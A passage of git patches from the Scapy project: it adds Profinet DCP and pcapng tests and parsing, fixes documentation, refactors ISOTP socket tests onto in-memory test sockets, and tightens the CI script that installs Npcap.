1 and + pkt.sub_option == 3), # DCP IDENTIFY REQUEST # # Name of station (handled above) diff --git a/test/contrib/pnio_dcp.uts b/test/contrib/pnio_dcp.uts index 22771d0b2b6..232d5016795 100644 --- a/test/contrib/pnio_dcp.uts +++ b/test/contrib/pnio_dcp.uts @@ -206,6 +206,31 @@ assert(p[DCPControlBlock].response_sub_option == 0x02) assert(p[DCPControlBlock].block_error == 0x00) += DCP Set Full IP Suite Request parsing + +p = Ether(b'\x12\x34\x00\x78\x90\xab\xc8\x5b\x76\xe6\x89\xdf' \ + b'\x88\x92\xfe\xfd\x04\x00\x00\x00\x00\x04\x00\x00' \ + b'\x00\x28\x01\x03\x00\x1e\x00\x00\xc0\xa8\x01\xab' \ + b'\xff\xff\xff\x00\xc0\xa8\x01\x01\x01\x02\x03\x04' \ + b'\x05\x06\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') + +assert(p[ProfinetIO].frameID == 0xfefd) +assert(p[ProfinetDCP].service_id == 0x04) +assert(p[ProfinetDCP].service_type == 0x00) +assert(p[ProfinetDCP].xid == 0x0000004) +assert(p[ProfinetDCP].reserved == 0x00) +assert(p[ProfinetDCP].dcp_data_length == 40) +assert(p[ProfinetDCP].option == 0x01) +assert(p[ProfinetDCP].sub_option == 0x03) +assert(p[ProfinetDCP].ip == "192.168.1.171") +assert(p[ProfinetDCP].netmask == "255.255.255.0") +assert(p[ProfinetDCP].gateway == "192.168.1.1") +assert(p[ProfinetDCP].dnsaddr[0] == "1.2.3.4") +assert(p[ProfinetDCP].dnsaddr[1] == "5.6.7.8") +assert(p[ProfinetDCP].dnsaddr[2] == "0.0.0.0") +assert(p[ProfinetDCP].dnsaddr[3] == "0.0.0.0") + + = DCP Identify All Request crafting # dcp_data_length cannot be calculated automatically at this time @@ -255,4 +280,23 @@ assert(p[DCPNameOfStationBlock].block_info == 0x00) assert(p[DCPNameOfStationBlock].name_of_station == b'device') += DCP Set Full IP Suite Request crafting + +p = ProfinetIO(frameID=DCP_GET_SET_FRAME_ID) / ProfinetDCP(service_id=DCP_SERVICE_ID_SET, service_type=DCP_REQUEST, option=1, sub_option=3, ip='192.168.1.171', netmask='255.255.255.0', gateway='192.168.1.1', dnsaddr=['1.2.3.4', '5.6.7.8'], dcp_data_length=40, dcp_block_length=30) + +assert(p[ProfinetIO].frameID == 0xfefd) +assert(p[ProfinetDCP].service_id == 0x04) +assert(p[ProfinetDCP].service_type == 0x00) +assert(p[ProfinetDCP].xid == 0x1000001) +assert(p[ProfinetDCP].reserved == 0x00) +assert(p[ProfinetDCP].dcp_data_length == 40) +assert(p[ProfinetDCP].option == 0x01) +assert(p[ProfinetDCP].sub_option == 0x03) +assert(p[ProfinetDCP].ip == "192.168.1.171") +assert(p[ProfinetDCP].netmask == "255.255.255.0") +assert(p[ProfinetDCP].gateway == "192.168.1.1") +assert(p[ProfinetDCP].dnsaddr[0] == "1.2.3.4") +assert(p[ProfinetDCP].dnsaddr[1] == "5.6.7.8") + + conf.debug_dissector = old_conf_dissector From d42e30cdfcc379579c9c367b81f68c9652f23123 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 12 Oct 2021 10:54:24 +0200 Subject: [PATCH 0670/1632] Fix code block in automotive documentation. --- doc/scapy/layers/automotive.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index c64c05ca471..702ffcba7c5 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -657,7 +657,7 @@ Creating a CTO message:: CTORequest() / GetDaqResolutionInfo() CTORequest() / GetSeed(mode=0x01, resource=0x00) -To send the message over CAN a header has to be added +To send the message over CAN a header has to be added:: pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() sock = CANSocket(iface=can.interface.Bus(bustype='socketcan', channel='vcan0')) From 7feb6bfc2bdbf9a132c91f0498301f20f4250f5b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 5 Oct 2021 13:36:26 +0200 Subject: [PATCH 0671/1632] Get linktype fron PcapNg --- scapy/utils.py | 12 +++++++++++- test/regression.uts | 15 +++++++++++++++ 2 files changed, 26 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index cb58055e048..3a711bdc3ea 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2154,7 +2154,17 @@ def tcpdump( if linktype is None and isinstance(pktlist, str): # linktype is unknown but required. Read it from file with PcapReader(pktlist) as rd: - linktype = rd.linktype + if isinstance(rd, PcapNgReader): + # Get the linktype from the first packet + try: + _, metadata = rd._read_packet() + linktype = metadata.linktype + except EOFError: + raise ValueError( + "Cannot get linktype from a PcapNg packet." + ) + else: + linktype = rd.linktype from scapy.arch.common import compile_filter compile_filter(flt, linktype=linktype) args.append(flt) diff --git a/test/regression.uts b/test/regression.uts index 23c3a7163bc..a63924dbebf 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1902,6 +1902,21 @@ fdesc.close() assert list(pktpcap[TCP]) == list(pktpcap_tcp) os.unlink(filename) += Check offline sniff() with a PcapNg file and a filter (by file object) +~ tcpdump + +pcapng_data = b'\n\r\r\n`\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x04\x009\x00TShark (Wireshark) 3.2.3 (Git v3.2.3 packaged as 3.2.3-1)\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\xe4\x00\x00\x00\xff\xff\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x98\xcd\x05\x00\x19\x83\xf7\x9e\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r<\x00\x00\x00' + +fdesc, filename = tempfile.mkstemp() +os.close(fdesc) +fd = open(filename, "wb") +fd.write(pcapng_data) +fd.close() + +packets = sniff(offline=filename, filter="udp") +os.unlink(filename) +assert(UDP in packets[0]) + = Check offline sniff() with Packets and tcpdump ~ tcpdump From 8e4fe556b3c18efa897730ef1371e9e0601fea85 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 12 Oct 2021 17:38:36 +0200 Subject: [PATCH 0672/1632] Remove buggy tests from isotp_soft_socket.uts --- test/contrib/isotp_soft_socket.uts | 271 ++++++++++++----------------- 1 file changed, 107 insertions(+), 164 deletions(-) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 7696ac88ece..36c6e1a8643 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -527,151 +527,99 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as assert(str(exception) == "TX state was reset due to timeout") = Check if not sending the second FC will make the socket timeout + exception = None isotp = ISOTP(data=b"\xa5" * 120) -test_sem = threading.Semaphore(0) -evt = threading.Event() - -def acker(): - with new_can_socket(iface0) as cans: - evt.set() - can = cans.sniff(timeout=0.1, count=1)[0] - cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))) - -thread = Thread(target=acker) -thread.start() -evt.wait(timeout=5) - -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: +cans = TestSocket(CAN) +isocan = TestSocket(CAN) +cans.pair(isocan) + +acker = AsyncSniffer(store=False, opened_socket=cans, + prn=lambda x: cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))), + count=1, timeout=1) +acker.start() +with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: try: s.send(isotp) except Scapy_Exception as ex: exception = ex +acker.join(timeout=5) cans.close() -thread.join(15) -assert not thread.is_alive() +isocan.close() assert(exception is not None) print(exception) assert(str(exception) == "TX state was reset due to timeout") = Check if reception of an overflow FC will make a send fail + exception = None isotp = ISOTP(data=b"\xa5" * 120) -test_sem = threading.Semaphore(0) -evt = threading.Event() +cans = TestSocket(CAN) +isocan = TestSocket(CAN) +cans.pair(isocan) -def acker(): - with new_can_socket(iface0) as cans: - evt.set() - can = cans.sniff(timeout=1, count=1)[0] - cans.send(CAN(identifier = 0x241, data=dhex("32 00 00"))) +acker = AsyncSniffer(store=False, opened_socket=cans, + prn=lambda x: cans.send( + CAN(identifier = 0x241, data=dhex("32 00 00"))), + count=1, timeout=1) +acker.start() -thread = Thread(target=acker) -thread.start() -evt.wait(timeout=5) - -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: try: s.send(isotp) except Scapy_Exception as ex: exception = ex -thread.join(15) -assert not thread.is_alive() +acker.join(timeout=5) +cans.close() +isocan.close() assert(exception is not None) - assert(str(exception) == "Overflow happened at the receiver side") = Close the Socket -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: +isocan = TestSocket(CAN) +with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: s.close() +isocan.close() + + More complex operations = ISOTPSoftSocket sr1 -drain_bus(iface0) -drain_bus(iface1) - -evt = threading.Event() msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -rx2 = None -evt2 = threading.Event() -def sender(sock): - global evt, rx2, msg - evt2.set() - evt.wait(timeout=5) - rx2 = sock.sr1(msg, timeout=3, verbose=True) - -with new_can_socket0() as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ - new_can_socket0() as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: - txThread = threading.Thread(target=sender, args=(sock_tx,)) - txThread.start() - evt2.wait(timeout=1) - rx = sock_rx.sniff(timeout=3, count=1, started_callback=evt.set)[0] - sock_rx.send(msg) - sent = True - txThread.join(timeout=5) - assert not txThread.is_alive() +with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ + TestSocket(CAN) as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: + isocan_rx.pair(isocan_tx) + sniffer = AsyncSniffer(opened_socket=sock_rx, timeout=1, count=1, prn=lambda x: sock_rx.send(msg)) + sniffer.start() + rx2 = sock_tx.sr1(msg, timeout=3, verbose=True) + sniffer.join(timeout=1) + rx = sniffer.results[0] assert(rx == msg) -assert(sent) assert(rx2 is not None) assert(rx2 == msg) -= ISOTPSoftSocket sr1 and ISOTP test vice versa -drain_bus(iface0) -drain_bus(iface1) - -rx2 = None -sent = False -evt = threading.Event() -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') - -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x123, 0x321) as txSock: - def receiver(): - global rx2, sent - with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rxSock: - evt.set() - rx2 = rxSock.sniff(count=1, timeout=3) - rxSock.send(msg) - sent = True - rxThread = threading.Thread(target=receiver, name="receiver") - rxThread.start() - evt.wait(timeout=5) - rx = txSock.sr1(msg, timeout=5,verbose=True) - rxThread.join(timeout=5) - assert not rxThread.is_alive() - -assert(rx is not None) -assert(rx == msg) -assert(len(rx2) == 1) -assert(rx2[0] == msg) -assert(sent) - = ISOTPSoftSocket sniff msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -with new_can_socket0() as isocan1, ISOTPSoftSocket(isocan1, 0x123, 0x321) as sock, \ - new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rx_sock: +with TestSocket(CAN) as isocan1, ISOTPSoftSocket(isocan1, 0x123, 0x321) as sock, \ + TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rx_sock: + isocan1.pair(isocan) msg.data += b'0' sock.send(msg) - time.sleep(0.01) msg.data += b'1' sock.send(msg) - time.sleep(0.01) msg.data += b'2' sock.send(msg) - time.sleep(0.01) msg.data += b'3' sock.send(msg) - time.sleep(0.01) msg.data += b'4' sock.send(msg) - time.sleep(0.01) rx = rx_sock.sniff(count=5, timeout=5) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') @@ -689,19 +637,18 @@ assert(rx[4] == msg) + ISOTPSoftSocket MITM attack tests = bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package forwarding vcan1 -drain_bus(iface0) -drain_bus(iface1) - succ = False -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ +with TestSocket(CAN) as can0_0, \ + TestSocket(CAN) as can0_1, \ + TestSocket(CAN) as can1_0, \ + TestSocket(CAN) as can1_1, \ ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ ISOTPSoftSocket(can1_1, sid=0x141, did=0x141) as bSocket1: + can0_0.pair(can0_1) + can1_1.pair(can1_0) evt = threading.Event() def forwarding(pkt): global forwarded @@ -724,26 +671,22 @@ assert forwarded == 1 assert len(packetsVCan1) == 1 assert succ -drain_bus(iface0) -drain_bus(iface1) - = bridge and sniff with isotp soft sockets and multiple long packets -drain_bus(iface0) -drain_bus(iface1) - N = 3 T = 20 succ = False -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ +with TestSocket(CAN) as can0_0, \ + TestSocket(CAN) as can0_1, \ + TestSocket(CAN) as can1_0, \ + TestSocket(CAN) as can1_1, \ ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ ISOTPSoftSocket(can1_1, sid=0x141, did=0x541) as bSocket1: + can0_0.pair(can0_1) + can1_1.pair(can1_0) evt = threading.Event() def forwarding(pkt): global forwarded @@ -768,23 +711,19 @@ assert forwarded == N assert len(packetsVCan1) == N assert succ -drain_bus(iface0) -drain_bus(iface1) - = bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package change vcan1 -drain_bus(iface0) -drain_bus(iface1) - succ = False -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ +with TestSocket(CAN) as can0_0, \ + TestSocket(CAN) as can0_1, \ + TestSocket(CAN) as can1_0, \ + TestSocket(CAN) as can1_1, \ ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ ISOTPSoftSocket(can1_0, sid=0x641, did=0x241) as isoTpSocket1, \ ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ ISOTPSoftSocket(can1_1, sid=0x241, did=0x641) as bSocket1: + can0_0.pair(can0_1) + can1_1.pair(can1_0) evt = threading.Event() def forwarding(pkt): pkt.data = 'changed' @@ -805,13 +744,11 @@ assert len(packetsVCan1) == 1 assert packetsVCan1[0].data == b'changed' assert succ -drain_bus(iface0) -drain_bus(iface1) - = Two ISOTPSoftSockets at the same time, sending and receiving -with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ - new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + cs1.pair(cs2) isotp = ISOTP(data=b"\x10\x25" * 43) s2.send(isotp) result = s1.sniff(count=1, timeout=5) @@ -822,8 +759,9 @@ assert(result[0].data == isotp.data) = Two ISOTPSoftSockets at the same time, sending and receiving with tx_gap -with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ - new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + cs1.pair(cs2) isotp = ISOTP(data=b"\x10\x25" * 43) s2.send(isotp) result = s1.sniff(count=1, timeout=5) @@ -833,8 +771,9 @@ assert(result[0].data == isotp.data) = Two ISOTPSoftSockets at the same time, multiple sends/receives -with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ - new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + cs1.pair(cs2) for i in range(1, 40, 5): isotp = ISOTP(data=bytearray(range(i, i * 2))) s2.send(isotp) @@ -844,67 +783,70 @@ with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, = Send a single frame ISOTP message with padding -with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: + +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, padding=True) as s: + with TestSocket(CAN) as cans: + cs1.pair(cans) s.send(ISOTP(data=dhex("01"))) res = cans.sniff(timeout=1, count=1)[0] assert(res.length == 8) = Send a two-frame ISOTP message with padding -acker_ready = threading.Event() -def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can = acks.sniff(timeout=1, count=1)[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) - -with new_can_socket(iface0) as cans: - ack_thread = Thread(target=acker) - ack_thread.start() - acker_ready.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 CC CC CC CC CC")) - ack_thread.join(timeout=5) - assert not ack_thread.is_alive() +acks = TestSocket(CAN) +cans = TestSocket(CAN) +acks.pair(cans) + +acker = AsyncSniffer(opened_socket=acks, store=False, prn=lambda x: acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))), timeout=1, count=1) +acker.start() +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + acks.pair(isocan) + cans.pair(isocan) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08 CC CC CC CC CC")) + +acker.join(timeout=5) = Receive a padded single frame ISOTP message with padding disabled -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: - with new_can_socket(iface0) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: + with TestSocket(CAN) as cans: + cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) = Receive a padded single frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with TestSocket(CAN) as cans: + cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) = Receive a non-padded single frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with TestSocket(CAN) as cans: + cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) = Receive a padded two-frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with TestSocket(CAN) as cans: + cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) res = s.sniff(count=1, timeout=1)[0] @@ -912,8 +854,9 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, = Receive a padded two-frame ISOTP message with padding disabled -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: - with new_can_socket(iface0) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: + with TestSocket(CAN) as cans: + cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) res = s.sniff(count=1, timeout=1)[0] From 1de61c7d8b6904d06fbc92d76fa4ada14c2785a0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 14 Oct 2021 14:17:23 +0200 Subject: [PATCH 0673/1632] Remove more buggy tests from isotp_soft_socket.uts --- test/contrib/isotp_soft_socket.uts | 44 ++++++++++++++---------------- 1 file changed, 21 insertions(+), 23 deletions(-) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 36c6e1a8643..42273e0aaef 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -579,13 +579,6 @@ isocan.close() assert(exception is not None) assert(str(exception) == "Overflow happened at the receiver side") -= Close the Socket -isocan = TestSocket(CAN) -with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - s.close() - -isocan.close() - + More complex operations = ISOTPSoftSocket sr1 @@ -674,7 +667,7 @@ assert succ = bridge and sniff with isotp soft sockets and multiple long packets N = 3 -T = 20 +T = 3 succ = False with TestSocket(CAN) as can0_0, \ @@ -705,7 +698,8 @@ with TestSocket(CAN) as can0_0, \ isoTpSocket0.send(ISOTP(b'RequestASDF1234567890')) packetsVCan1 = isoTpSocket1.sniff(timeout=T, count=N) threadBridge.join(timeout=5) - assert not threadBridge.is_alive() + +assert not threadBridge.is_alive() assert forwarded == N assert len(packetsVCan1) == N @@ -730,7 +724,7 @@ with TestSocket(CAN) as can0_0, \ return pkt def bridge(): global succ - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=5, + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=3, started_callback=evt.set, count=1) succ = True threadBridge = threading.Thread(target=bridge) @@ -777,9 +771,9 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ for i in range(1, 40, 5): isotp = ISOTP(data=bytearray(range(i, i * 2))) s2.send(isotp) - result = s1.sniff(count=1, timeout=5) - assert len(result) - assert (result[0].data == isotp.data) + result = s1.sniff(count=8, timeout=5) + +assert len(result) == 8 = Send a single frame ISOTP message with padding @@ -798,23 +792,27 @@ acks = TestSocket(CAN) cans = TestSocket(CAN) acks.pair(cans) -acker = AsyncSniffer(opened_socket=acks, store=False, prn=lambda x: acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))), timeout=1, count=1) +def send_ack(x): + acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + +acker = AsyncSniffer(opened_socket=acks, store=False, prn=send_ack, timeout=1, count=1) acker.start() + with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: acks.pair(isocan) cans.pair(isocan) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 CC CC CC CC CC")) + canpks = cans.sniff(timeout=1, count=3) acker.join(timeout=5) +canpks.sort(key=lambda x:x.identifier) +assert(canpks[1].identifier == 0x641) +assert(canpks[1].data == dhex("10 08 01 02 03 04 05 06")) +assert(canpks[0].identifier == 0x241) +assert(canpks[0].data == dhex("30 00 00")) +assert(canpks[2].identifier == 0x641) +assert(canpks[2].data == dhex("21 07 08 CC CC CC CC CC")) + = Receive a padded single frame ISOTP message with padding disabled with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: From ed7e929f12c82f3ec7594031f00ad3d45a5eace4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 10 Oct 2021 16:00:52 +0200 Subject: [PATCH 0674/1632] Minor updates to npcap install script --- .config/appveyor/InstallNpcap.ps1 | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index d3f8ff0c4f8..d8d3026e6b2 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -1,7 +1,7 @@ # Install Npcap on the machine. # Config: -$npcap_oem_file = "npcap-1.31-oem.exe" +$npcap_oem_file = "npcap-1.55-oem.exe" # Note: because we need the /S option (silent), this script has two cases: # - The script is runned from a master build, then use the secure variable 'npcap_oem_key' which will be available @@ -24,7 +24,12 @@ if (Test-Path Env:npcap_oem_key){ # Key is here: on master $headers = @{ Authorization = $basicAuthValue } $secpasswd = ConvertTo-SecureString $pass -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential($user, $secpasswd) - Invoke-WebRequest -uri (-join("https://nmap.org/npcap/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential + try { + Invoke-WebRequest -uri (-join("https://nmap.org/npcap/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential + } catch [System.Net.WebException],[System.IO.IOException] { + Write-Error "Error while dowloading npcap !" + exit 1 + } } else { # No key: PRs echo "Using backup 0.96" $file = $PSScriptRoot+"\npcap-0.96.exe" @@ -33,8 +38,8 @@ if (Test-Path Env:npcap_oem_key){ # Key is here: on master # Now let's check its checksum $_chksum = $(CertUtil -hashfile $file SHA256)[1] -replace " ","" if ($_chksum -ne "83667e1306fdcf7f9967c10277b36b87e50ee8812e1ee2bb9443bdd065dc04a1"){ - echo "Checksums does NOT match !" - exit + Write-Error "Checksums does NOT match !" + exit 1 } else { echo "Checksums matches !" } @@ -42,7 +47,11 @@ if (Test-Path Env:npcap_oem_key){ # Key is here: on master echo ('Installing: ' + $file) # Run installer -Start-Process $file -ArgumentList "/loopback_support=yes /S" -wait -if($?) { - echo "Npcap installation completed" +$process = Start-Process $file -ArgumentList "/loopback_support=yes /S" -PassThru -Wait +if($process.ExitCode -eq 0) { + echo "Npcap installation completed !" + exit 0 +} else { + Write-Error "Npcap installation failed !" + exit 1 } From 9a91a79ffe13e51254076b1a8a2e5f5bab45f612 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 16 Oct 2021 18:44:35 +0200 Subject: [PATCH 0675/1632] pcapng TLS Decryption Secrets Block --- scapy/utils.py | 53 ++++++++++++++++++++++++++++++++++++++++++++++++++ test/tls.uts | 20 +++++++++++++++++++ 2 files changed, 73 insertions(+) diff --git a/scapy/utils.py b/scapy/utils.py index 3a711bdc3ea..6ed622bd3d3 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1413,6 +1413,7 @@ def __init__(self, filename, fdesc=None, magic=None): # type: ignore 2: self._read_block_pkt, 3: self._read_block_spb, 6: self._read_block_epb, + 10: self._read_block_dsb, } self.endian = "!" # Will be overwritten by first SHB @@ -1607,6 +1608,58 @@ def _read_block_pkt(self, block, size): tslow=tslow, wirelen=wirelen)) + def _read_block_dsb(self, block, size): + # type: (bytes, int) -> None + """Decryption Secrets Block""" + + # Parse the secrets type and length fields + try: + secrets_type, secrets_length = struct.unpack( + self.endian + "II", + block[:8], + ) + block = block[8:] + except struct.error: + 